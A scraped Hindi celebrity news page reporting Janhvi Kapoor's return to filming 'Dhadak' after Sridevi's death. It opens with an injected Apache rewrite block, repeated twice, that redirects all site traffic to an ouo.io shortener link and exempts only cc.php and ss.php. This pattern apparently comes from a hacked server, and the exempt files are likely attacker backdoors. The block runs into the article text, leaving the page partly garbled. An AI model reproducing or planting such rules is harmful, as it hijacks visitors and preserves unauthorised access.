
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 770
Previousमुंबई। श्रीदेवी के अचानक यूं दुनिया से चले जाने से उनकी बड़ी बेटी जाह्नवी पूरी तरह से टूट गई हैं। कल हरिद्वार में अस्थियां विसर्जन के बाद जाह्नवी ने शूटिंग पर वापसी कर ली है। अपनी आने वाली फिल्म 'धड़क' की शूटिंग पर जाह्नवी वापसी कर चुकी हैं। मां के जाने का गम जाह्नवी के चेहरे पर साफ दिखाई दे रहा है। मायूस सी जाह्नवी अपनी धड़क से बॉलीवुड में डेब्यू करने जा रही हैं। और फिल्म में जाह्नवी अपनी मां की फिल्म 'इंग्लिश-विंग्लिश' वाले लुक में ही नजर आ रही हैं। बता दें कि 6 मार्च को जाह्नवी 21 साल की हो गईं। परिवार और कजिन्स के साथ उन्होंने अपना ये खास दिन सेलिब्रेट किया। कपूर परिवार के सभी बेटियों ने जाह्नवी को सपप्राइज दिया और वहीं सौतेली बहन अंशुला रात को अपने घर पर फैमिली डिनर प्लान किया। इस पार्टी में घर के सभी सदस्य नजर आए। जाह्नवी की डेब्यू फिल्म करण जौहर के धर्मा प्रोडक्शन के तहत बन रही है। श्रीदेवी की मौत को अभी ज्यादा समय नहीं हुआ है और जाह्नवी भी अभी इस दुखद खबर से बाहर नहीं आ पाई हैं। इसलिए करण जौहर चाहते हैं कि जाह्नवी को सेट पर अच्छा माहौल दिया जाए। बता दें कि श्रीदेवी और करण आपस में काफी अच्छे दोस्त थे और अब जाह्नवी भी करण से काफी घुल-मिल गए हैं इसलिए करण भी उन्हें इस गम से बाहर निकलने में मदद कर रहे हैं। साथ ही करण ने अपनी टीम को ये हिदायत भी दी है कि जाह्नवी पर किसी भी तरह का कोई दबाव न बनाया जाए। फिल्म धड़क इस साल 20 जुलाई को रिलीज होगी।